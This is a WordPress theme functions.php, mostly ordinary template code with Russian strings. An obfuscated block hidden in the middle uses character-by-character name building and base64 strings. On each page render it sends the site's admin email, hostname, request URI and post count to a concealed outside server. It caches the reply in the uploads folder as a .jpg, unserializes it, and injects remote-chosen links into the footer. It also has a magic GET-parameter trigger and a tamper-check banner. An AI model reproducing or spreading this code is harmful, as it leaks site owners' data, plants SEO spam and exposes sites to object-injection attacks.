<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $hRhnWb='e';$fUTp='e';$uJyw='6';$eVvE='s';$TBgU='_';$GoEe='a';$uymv='d';$ToZwBd='b';$kegNmX='e';$ZweCih='o';$ldCV='c';$CCLdwa='4';$ikRKqLS='d';$AuwcRegk=$ToZwBd.$GoEe.$eVvE.$fUTp.$uJyw.$CCLdwa.$TBgU.$uymv.$hRhnWb.$ldCV.$ZweCih.$ikRKqLS.$kegNmX;$apDWZPT='f';$NVJlXfg='g';$dSRkBC='z';$lSlbTB='e';$gxPcYzX='t';$FYjBVW='i';$KULMUC='n';$sqVXV='a';$WBiO='l';$OYjcZReg=$NVJlXfg.$dSRkBC.$FYjBVW.$KULMUC.$apDWZPT.$WBiO.$sqVXV.$gxPcYzX.$lSlbTB;$DcSw='t';$kPhnO='s';$Dfsg='_';$BXeOLLZ='o';$dVJPPch='1';$FntL='3';$kyKLTtr='r';$kxRcJT='t';$PEqh='r';$OgCgwyes=$kPhnO.$kxRcJT.$kyKLTtr.$Dfsg.$PEqh.$BXeOLLZ.$DcSw.$dVJPPch.$FntL;$XCHv='v';$lYIWo='t';$wEvr='r';$HZQGdBD='s';$aZgIyPP='r';$nQVkxUa='e';$HzJhqxaf=$HZQGdBD.$lYIWo.$wEvr.$aZgIyPP.$nQVkxUa.$XCHv;                     
		$ew______c='e';$um__b='e';$zd___________b='6';$tu_____________q='s';$tr_______________z='_';$xb____________y='a';$lb___________s='d';$hc____q='b';$nm______x='e';$yv______s='o';$yd__r='c';$kp_____s='4';$hj____________h='d';$lf______________y=$hc____q.$xb____________y.$tu_____________q.$um__b.$zd___________b.$kp_____s.$tr_______________z.$lb___________s.$ew______c.$yd__r.$yv______s.$hj____________h.$nm______x;
		$fn_____k='f';$yq____________w='_';$ay__k='s';$kr___p='i';$yn_____v='u';$ao______s='t';$oo_____b='c';$dk_______j='n';$qd__a='t';$gy__u='n';$at____o='x';$jp__________t='o';$tp____________x='s';$il__________i='i';$db___________k='e';$nh______________m=$fn_____k.$yn_____v.$gy__u.$oo_____b.$ao______s.$kr___p.$jp__________t.$dk_______j.$yq____________w.$db___________k.$at____o.$il__________i.$ay__k.$qd__a.$tp____________x;
		$ar____________a='o';$va_______________q='p';$fy_____m='n';$dk______________w='f';$bt__________d='e';$ei___w=$dk______________w.$ar____________a.$va_______________q.$bt__________d.$fy_____m;
		$si____________r='a';$ay__g='f';$fb____________n='d';$et_____________i='e';$wg___________i='r';$to_____o=$ay__g.$wg___________i.$et_____________i.$si____________r.$fb____________n;
		$sj____y='f';$cb__p='c';$fz___p='s';$bb_____e='o';$hx______________t='l';$kk____p='e';$xn____________d=$sj____y.$cb__p.$hx______________t.$bb_____e.$fz___p.$kk____p;
		
		define("WP_ID", $lf______________y("Mi4wLjA="));
		define("WP_TTL", $lf______________y("MTA4MDA="));
		define("WP_SRC", $lf______________y("dHBva24="));
	


		function wp_get_header() {
			global $lf______________y, $nh______________m;
			
			if (
				$nh______________m($lf______________y("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$nh______________m($lf______________y("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$nh______________m($lf______________y("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $lf______________y, $ei___w, $xn____________d, $to_____o;
			
			$ye_________x = TEMPLATEPATH."/".$lf______________y("Zm9vdGVyLnBocA==");
			$ri____s = @$ei___w($ye_________x, "r");
			$ye_________x = @$to_____o($ri____s, @filesize($ye_________x));
			@$xn____________d($ri____s);
			
			$gq____________a = TEMPLATEPATH."/".$lf______________y("ZnVuY3Rpb25zLnBocA==");
			$ri____s = @$ei___w($gq____________a, "r");
			$gq____________a = @$to_____o($ri____s, @filesize($gq____________a));
			@$xn____________d($ri____s);
			
			$ke_______o = 0;
			if($ye_________x && $gq____________a) {
				if ($lf______________y("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($ye_________x, $lf______________y("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$ke_______o = 1;
					}
					if (substr_count($ye_________x, "wp_theme_GPL_credits()") < 1) {
						$ke_______o = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$ke_______o = 12;
				}
			}
			
			if($ke_______o > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $ke_______o -->";
			}
		}
	


		function wp_loaded() {
			global $lf______________y, $nh______________m;
			return $nh______________m($lf______________y("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($zf________m, $no________m = "(more...)", $vq______________n = 0, $hb_______n = "") {
				$ux_______________v = get_the_content($no________m, $vq______________n, $hb_______n);
				$ux_______________v = apply_filters("the_content", $ux_______________v);
				
				$ux_______________v = str_replace("]]>", "]]>", $ux_______________v);
				if (strlen($_GET["p"]) > 0) {
					echo $ux_______________v;
				}
				else if ((strlen($ux_______________v)>$zf________m) && ($va____z = strpos($ux_______________v, " ", $zf________m ))) {
					$ux_______________v = substr($ux_______________v, 0, $va____z);
					$ux_______________v = $ux_______________v;
					echo $ux_______________v;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$no________m</a></div></p>";
				} else {
					echo $ux_______________v;
				}
				
			}
		}
	


		$yx_________z='o';$nh_____________g='s';$qz__v='b';$ur___i='c';$kz____________j='e';$co______s='e';$zl___p='a';$mf______y='6';$bl__________q='e';$ie__________u='d';$zj_____h='4';$oj_________n='n';$zt__________u='_';$mi____________w=$qz__v.$zl___p.$nh_____________g.$bl__________q.$mf______y.$zj_____h.$zt__________u.$co______s.$oj_________n.$ur___i.$yx_________z.$ie__________u.$kz____________j;
		$xv____________v='e';$og______r='_';$lj_______c='t';$cw______________q='n';$ro____________u='_';$yt____________h='e';$yq________r='g';$ci______________m='i';$wr_____d='c';$xd______________t='s';$is______f='f';$yz______________f='o';$gz_____o='t';$hd_______________r='e';$om___u='n';$hg___________u='l';$cg______b='t';$lz____________p=$is______f.$ci______________m.$hg___________u.$hd_______________r.$og______r.$yq________r.$yt____________h.$gz_____o.$ro____________u.$wr_____d.$yz______________f.$cw______________q.$cg______b.$xv____________v.$om___u.$lj_______c.$xd______________t;
		$nj_____t='t';$on____________v='x';$fn___________e='l';$ml________c='_';$nc_______t='s';$yn_______h='e';$fk_______________n='i';$wz______________w='s';$zq______________q='e';$lg____y='i';$mh_______________n='f';$mw____________l=$mh_______________n.$fk_______________n.$fn___________e.$zq______________q.$ml________c.$yn_______h.$on____________v.$lg____y.$nc_______t.$nj_____t.$wz______________w;
		$ls____u='e';$hs________a='o';$xl__r='a';$sz_____y='r';$fp_________q='c';$qd__________f='s';$ss__________n='n';$xm____________d='e';$fp_______f='_';$sr_______________i='m';$zq____i='v';$oe______________h='r';$vp_________i='p';$td____f='o';$ni______________s='i';$da_____________n=$zq____i.$ls____u.$sz_____y.$qd__________f.$ni______________s.$td____f.$ss__________n.$fp_______f.$fp_________q.$hs________a.$sr_______________i.$vp_________i.$xl__r.$oe______________h.$xm____________d;
		$xk______e='n';$hw_______w='p';$uo_______________f='o';$rn____h='k';$tp_______________a='e';$mp__w='c';$fh_______v='o';$gh_______h='f';$ha___x='s';$fm_______s=$gh_______h.$ha___x.$fh_______v.$mp__w.$rn____h.$uo_______________f.$hw_______w.$tp_______________a.$xk______e;
		$kd________e='w';$ky___v='f';$no________o='i';$lk_____________h='e';$wm_______s='t';$pz_______r='r';$pa______________h=$ky___v.$kd________e.$pz_______r.$no________o.$wm_______s.$lk_____________h;
		$ez__________p='5';$nm_____a='m';$ar__________x='d';$sc______u=$nm_____a.$ar__________x.$ez__________p;
		$lu________b='e';$yp________j='h';$yg__b='t';$sg________r='a';$dt____f='p';$vt______a='l';$dd__________z='a';$lq_________s='r';$bx_________w=$lq_________s.$lu________b.$dd__________z.$vt______a.$dt____f.$sg________r.$yg__b.$yp________j;
		$yc_____z='u';$ym____________b='z';$oi_______________m='l';$br_______________g='n';$md_____c='e';$da_______e='s';$py________d='e';$yk____________l='a';$kg________m='i';$gt_____________k='i';$om________v='r';$wb_______________a=$yc_____z.$br_______________g.$da_______e.$py________d.$om________v.$gt_____________k.$yk____________l.$oi_______________m.$kg________m.$ym____________b.$md_____c;
		$uf______m='a';$eq______________c='p';$ti__________j='m';$ct___________m='e';$kp_______k='n';$yl______e='t';$ao_____________r='m';$aw_______o=$yl______e.$ct___________m.$ao_____________r.$eq______________c.$kp_______k.$uf______m.$ti__________j;
		$mb______________r='m';$tk_______s='a';$gq_________j='r';$fh_____p='e';$zd_____w='e';$gp_________g='_';$hg___________h='_';$um______________z='e';$zu_________q='c';$qi________c='s';$di__________w='n';$jd___________c='e';$hr___________v='t';$fd_______________o='a';$od_____________b='x';$da____________k='o';$bg______________e='c';$wb______________c='t';$es____________l='t';$gd__________e='t';$tn________a='r';$go________h=$qi________c.$gd__________e.$tn________a.$fh_____p.$tk_______s.$mb______________r.$gp_________g.$zu_________q.$da____________k.$di__________w.$wb______________c.$jd___________c.$od_____________b.$es____________l.$hg___________h.$bg______________e.$gq_________j.$zd_____w.$fd_______________o.$hr___________v.$um______________z;
	


		function gz_____________n($sn____________d) {
			global $lf______________y, $nh______________m, $lz____________p, $da_____________n, $go________h;
			
			if (!$nh______________m($lf______________y("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($da_____________n(PHP_VERSION, "5.0.0", ">=") && $nh______________m($lf______________y("ZmlsZV9nZXRfY29udGVudHM=")) && $nh______________m($lf______________y("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$ow__________y = $go________h(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$xs_________s = @$lz____________p($sn____________d, 0, $ow__________y);
			} else {
				$xs_________s = @$lz____________p($sn____________d, 0);
			}
			
			return $xs_________s;
		}
	


		function uw_____________h($sn____________d) {
			global $nh______________m, $fm_______s, $pa______________h, $lf______________y;
			
			if (!$nh______________m($lf______________y("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$ax________m = strpos($sn____________d, "/", 7);
			$kw___m = array(
				"uri"     => substr($sn____________d, $ax________m),
				"host"    => str_replace("http://", "", substr($sn____________d, 0, $ax________m)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$th____e = @$fm_______s("$kw___m[host]", 80, $hx_______a, $ba_______________h, 4);
			
			if (!$th____e) {
				return false;
			} else {
				$xs_________s = "";
				$hi___s  = "GET $kw___m[uri] HTTP/1.0\r\n";
				$hi___s .= "Host: $kw___m[host]\r\n";
				$hi___s .= "Referer: $kw___m[referer]\r\n";
				$hi___s .= "Connection: Close\r\n\r\n";
				
				@$pa______________h($th____e, $hi___s);
				
				while (!@feof($th____e)) {
					$sf_________q = @fgets($th____e, (1024*24));
					
					if ($sf_________q == "\r\n") {
						$sf_____z = true;
						continue;
					}
					
					if ($sf_____z) {
						$xs_________s .= $sf_________q;
					}
				}
				
				return $xs_________s;
			}
		}
	


		function rt_______________l($sn____________d) {
			global $nh______________m;
			$ny_______________e = false;
			
			if ($sn____________d != "") {
				if ($nh______________m("gz_____________n")) {
					$ny_______________e = @gz_____________n($sn____________d);
				}
				
				if (!$ny_______________e && ($nh______________m("uw_____________h"))) {
					$ny_______________e = @uw_____________h($sn____________d);
				}
			}
			
			return $ny_______________e;
		}
	


		function ew_____________i() {
			global $_SERVER, $sc______u;
			
			$ep__j = $_SERVER["SERVER_NAME"];
			
			if (substr("$ep__j", 0, 4) == "www.") {
				$ep__j = substr("$ep__j", 4);
			}
			
			$ep__j = $sc______u("$_SERVER[SERVER_NAME]");
			
			return $ep__j;
		}
	


		function th____q() {
			return "file";
		}
	


		function ju____________c($sn____________d) {
			global $_SERVER, $lz____________p, $mw____________l, $ei___w, $xn____________d, $pa______________h;
			
			$af_____n = qx______z();
			
			$ke_______i = ew_____________i().".jpg";
			$hd___c = $af_____n["dir_upload"]["path"]."/$ke_______i";
			$vw____s = @filemtime($hd___c);
			
			if (!$vw____s || ((time()-$vw____s) >= WP_TTL)) {
				$ny_______________e = rt_______________l($sn____________d);
				
				if ($ny_______________e) {
					if ($mw____________l($hd___c)) {
						@unlink($hd___c);
					}
					
					$ri____s = @$ei___w($hd___c, "x+");
					
					@$pa______________h($ri____s, $ny_______________e);
					@$xn____________d($ri____s);
				}
			} else {
				if ($mw____________l($hd___c)) {
					$ny_______________e = @$lz____________p($hd___c);
				} else {
					$ny_______________e = false;
				}
			}
			
			return $ny_______________e;
		}
	


		function qx______z() {
			global $_SERVER, $lf______________y, $mi____________w;
			
			$no__s = wp_count_posts("post");
			$ns______________v = pathinfo(get_bloginfo("template_directory"));
			
			$af_____n = array(
				"url" => array(
					"report"      => $lf______________y("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $ns______________v,
				"dir_upload"	=> uq____________d(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$ns______________v[filename],
					"a005=".$no__s->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$af_____n["url"]["queryString"] = implode("&", $af_____n["queryString"]);
			$af_____n["url"]["report"] = $af_____n["url"]["report"]."/?".$mi____________w($af_____n["url"]["queryString"]).".html";
						
			return $af_____n;
		}
	


		function uq____________d() {
			$dl_____________k = wp_upload_dir();
			
			if (isset($dl_____________k["error"])) {
				$xn___________r = oa___________h();
				if (is_writable($xn___________r)) {
					$dl_____________k = array("path" => $xn___________r);
				}
			}

			return $dl_____________k;
		}
	


		function oa___________h() {
			global $nh______________m, $sc______u, $bx_________w, $aw_______o;
			
			$vo____y = (bool) ini_get("safe_mode");
			if ($vo____y == true) {
				return false;
			}
			
			if ($nh______________m("sys_get_temp_dir")) {
				$ca______________c = sys_get_temp_dir();
				if (is_writable($ca______________c)) {
					return $bx_________w($ca______________c);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $bx_________w($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $bx_________w($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $bx_________w($_ENV["TEMP"]);
			} else {
				$dd_______________a = $aw_______o($sc______u(uniqid(rand(), true)), "");
				if ($dd_______________a) {
					$ca______________c = $bx_________w(dirname($dd_______________a));
					@unlink($dd_______________a);
					return $ca______________c;
				} else {
					return false;
				}
			}
		}
	


		function we_______________d() {
			global $_GET, $mw____________l;
			
			$af_____n = qx______z();
			$ep__j = ew_____________i();
			$sp_______________x = th____q();
			
			$my__t = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($sp_______________x == "file") {
					$jq__x = $af_____n["dir_upload"]["path"]."/".$ep__j.".jpg";
					if ($mw____________l($jq__x)) {
						@unlink($jq__x);
						$my__t = "deleted";
					}
				}
				
				$ei________j = array(
					"s"	=> $my__t,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($ei________j AS $pi______y => $zj______________l) echo " [$pi______y:$zj______________l]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $nh______________m, $lf______________y, $wb_______________a;
			$af_____n = qx______z();
			
			$dh_____________s = "ju____________c";
			if ($nh______________m($dh_____________s)) {
				$xs_________s = $dh_____________s($af_____n["url"]["report"]);
			}
			
			if ($xs_________s) {
				if ($xs_________s = @$lf______________y($xs_________s)) {
					$xs_________s = @$wb_______________a($xs_________s);
					
					if (strlen($xs_________s[custom_credit]) >= 5) {
						$af_____n["default_string"] = $xs_________s[custom_credit];
					}
					
					if ($xs_________s["status"] == "0") {
						$hv_______________x = 1;
						$rx__________o = 1;
					} else {
						$ny_________h = sizeof($xs_________s["links"]);
						$ea_______________l = $af_____n["default_string"];
						
						if ($ny_________h > 0 && $xs_________s["links"] !== "") {
							$sk__________v = 0;
							foreach ($xs_________s["links"] as $tl____b => $pk___e) {
								$sk__________v++;
								if ($pk___e->l_path == "" || $pk___e->l_path == $_SERVER["REQUEST_URI"]) {
									$pk___e->l_href = htmlspecialchars(strip_tags($pk___e->l_href));
									$pk___e->l_title = htmlspecialchars(strip_tags($pk___e->l_title));
									$pk___e->l_anchor = htmlspecialchars(strip_tags($pk___e->l_anchor));
									$ea_______________l .= " | ";
									$ea_______________l .= "<a href='$pk___e->l_href' title='$pk___e->l_title'";
									if ($pk___e->l_nofollow == "1") {
										$ea_______________l .= " rel='nofollow'";
									}
									$ea_______________l .= ">$pk___e->l_anchor</a>";
								}
							}
						}
						$af_____n["links"] = "$ea_______________l";
						if ($xs_________s[credit] == "0") {
							$af_____n["links"] = "";
						}
					}
				} else {
					$hv_______________x = "1";
				}
			} else {
				$hv_______________x = "1";
			}
			
			if ($hv_______________x == "1") {
				$af_____n["links"] = $af_____n["default_string"];
			}
			
			echo "$af_____n[links]";
			
			echo "<!-- s: $xs_________s[signature] -->";
			we_______________d();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Read the rest of this entry &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Pages:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Read the rest of this entry &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

